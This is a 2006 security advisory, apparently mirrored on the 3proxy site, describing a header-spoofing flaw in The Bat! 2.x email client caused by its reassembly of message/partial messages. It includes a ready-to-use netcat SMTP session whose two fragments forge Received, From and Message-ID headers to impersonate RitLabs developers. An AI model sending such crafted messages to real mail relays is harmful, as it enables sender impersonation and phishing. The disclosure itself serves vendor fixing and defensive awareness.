× Few antiviral products inadequately detect 3proxy as Trojan.Daemonize, Backdoor.Daemonize, etc and many detect 3proxy as a PUA (potentially unwanted program). It may cause browser warning on download page. 3proxy is not trojan or backdoor and contains no functionality except described in documentation. Clear explanation of this fact is given, for example, in Microsoft's article.



Title:            The Bat! 2.x message headers spoofing
Author:           3APA3A <[email protected]>
Vendor:           RitLabs
Vendor's page     http://thebat.net/
Application:      The Bat 2.x (2.12.04 tested)
Not vulnerable:   The Bat! 3.5
Remote:           Yes, against client
Category:         Information spoofing

Intro:

The   Bat!   is   very  convenient,  powerful and secure (comparing with
others)   MUA  (Mail  User  Agent)  with  many  professional  features:
templates,  macroses,  Bayesian  SPAM  filter,  etc.  This is commercial
product from RitLabs.

Vulnerability:

Design  flow  in  the  way The Bat! shows message/partial messages allow
attacker  to  spoof RFC 822 headers or original message, including _all_
Received:  and  Message-ID:.  It makes it possible to create untrackable
message and spoof message origin, including sender's network.

Details:

The  Bat!  silently  re-assembles partial message and shows encapsulated
data.  The  headers shown are ones of encapsulated message. Real headers
are lost completely.

Exploit:

Replace @example.com with destination address
nc ip_of_smtp_relay 25 <thebatexploit.txt


-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
        by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
        for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
        number=2; total=2

Yours, The Bat! develpment team.
.
QUIT
-=-=-=-=-  end thebatexploit.txt  -=-=-=-=-

Workaround:

Do not trust data The Bat! shows in headers.

Solution:

Upgrade to The Bat! 3.x (not free)